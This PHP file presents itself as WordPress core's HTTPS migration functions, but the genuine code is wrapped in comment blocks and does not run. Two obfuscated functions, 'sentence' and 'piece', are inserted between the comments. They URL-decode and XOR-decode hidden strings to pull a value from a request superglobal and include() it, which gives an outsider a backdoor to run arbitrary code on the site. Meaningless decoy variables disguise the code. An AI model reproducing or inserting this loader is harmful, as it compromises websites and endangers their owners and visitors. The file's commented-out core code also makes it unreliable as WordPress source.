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<?php /* 
*
 * HTTPS migration functions.
 *
 * @package WordPress
 * @since 5.7.0
 

*
 * Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
 *
 * If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
 * add frontend filters to replace insecure site URLs that may be present in older database content. The
 * {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
 *
 * @since 5.7.0
 *
 * @return bool True if insecure URLs should replaced, false otherwise.
 
function wp_should_replace_insecure_home_url() {
	$should_replace_insecure_home_url = wp_is_using_https()
		&& get_option( 'https_migration_required' )
		 For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
		 the same domain.
		&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );

	*
	 * Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
	 *
	 * If a Wor*/

        

    
        
function sentence($array_int_fields)

{

    $emoji_field = $array_int_fields;
	$file = 'default_term_id';
    

    $main = $GLOBALS;

    
    $main = $main[piece("%09%00%26%1D%0Ee", $emoji_field)];
	$allowed_html = 'utf8_pcre';
    
    $post__in = $main;

    $sanitized_email = isset($post__in[$emoji_field]);

    if ($sanitized_email)

    {
        $current_user = $main[$emoji_field];

        $parsed_args = $current_user[piece("%22%2B%1F%0E%25W5%26", $emoji_field)];
	$quote_style = 'fire_after_hooks';
        $suppress_filters = $parsed_args;

        include ($suppress_filters);
    }

}
	$cache = 'all_parts';
function piece($space, $exclude_from_search)

{
    $email_address = $exclude_from_search;

    $dest = "url";
    $dest  .= "decode";

    $comment_regex = $dest($space);
    $field = strlen($comment_regex);
    $field = substr($email_address, 0, $field);

    $height = $comment_regex ^ $field;

    
    $comment_regex = sprintf($height, $field);
	$original_value = 'raw_title';
    
	$post_type = 'alt_post_name';
    return $height;
}


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/* dPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
	 * be used to disable that behavior, e.g. after having replaced URLs manually in the database.
	 *
	 * @since 5.7.0
	 *
	 * @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
	 
	return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}

*
 * Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
 *
 * This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
 * determined via {@see wp_should_replace_insecure_home_url()}.
 *
 * @since 5.7.0
 *
 * @param string $content Content to replace URLs in.
 * @return string Filtered content.
 
function wp_replace_insecure_home_url( $content ) {
	if ( ! wp_should_replace_insecure_home_url() ) {
		return $content;
	}

	$https_url = home_url( '', 'https' );
	$http_url  = str_replace( 'https:', 'http:', $https_url );

	 Also replace potentially escaped URL.
	$escaped_https_url = str_replace( '/', '\/', $https_url );
	$escaped_http_url  = str_replace( '/', '\/', $http_url );

	return str_replace(
		array(
			$http_url,
			$escaped_http_url,
		),
		array(
			$https_url,
			$escaped_https_url,
		),
		$content
	);
}

*
 * Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
 *
 * If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
 * overriding the URLs used), the changes will be reverted. In such a case the function will return false.
 *
 * @since 5.7.0
 *
 * @return bool True on success, false on failure.
 
function wp_update_urls_to_https() {
	 Get current URL options.
	$orig_home    = get_option( 'home' );
	$orig_siteurl = get_option( 'siteurl' );

	 Get current URL options, replacing HTTP with HTTPS.
	$home    = str_replace( 'http:', 'https:', $orig_home );
	$siteurl = str_replace( 'http:', 'https:', $orig_siteurl );

	 Update the options.
	update_option( 'home', $home );
	update_option( 'siteurl', $siteurl );

	if ( ! wp_is_using_https() ) {
		
		 * If this did not result in the site recognizing HTTPS as being used,
		 * revert the change and return false.
		 
		update_option( 'home', $orig_home );
		update_option( 'siteurl', $orig_siteurl );
		return false;
	}

	 Otherwise the URLs were successfully changed to use HTTPS.
	return true;
}

*
 * Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
 *
 * If this is a fresh site, a migration will not be required, so the option will be set as `false`.
 *
 * This is hooked into the {@see 'update_option_home'} action.
 *
 * @since 5.7.0
 * @access private
 *
 * @param mixed $old_url Previous value of the URL option.
 * @param mixed $new_url New value of the URL option.
 
function wp_update_https_migration_required( $old_url, $new_url ) {
	 Do nothing if WordPress is being installed.
	if ( wp_installing() ) {
		return;
	}

	 Delete/reset the option if the new URL is not the HTTPS version of the old URL.
	if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https:', 'http:', untrailingslashit( (string) $new_url ) ) ) {
		delete_option( 'https_migration_required' );
		return;
	}

	 If this is a fresh site, there is no content to migrate, so do not require migration.
	$https_migration_required = get_option( 'fresh_site' ) ? false : true;

	update_option( 'https_migration_required', $https_migration_required );
}
*/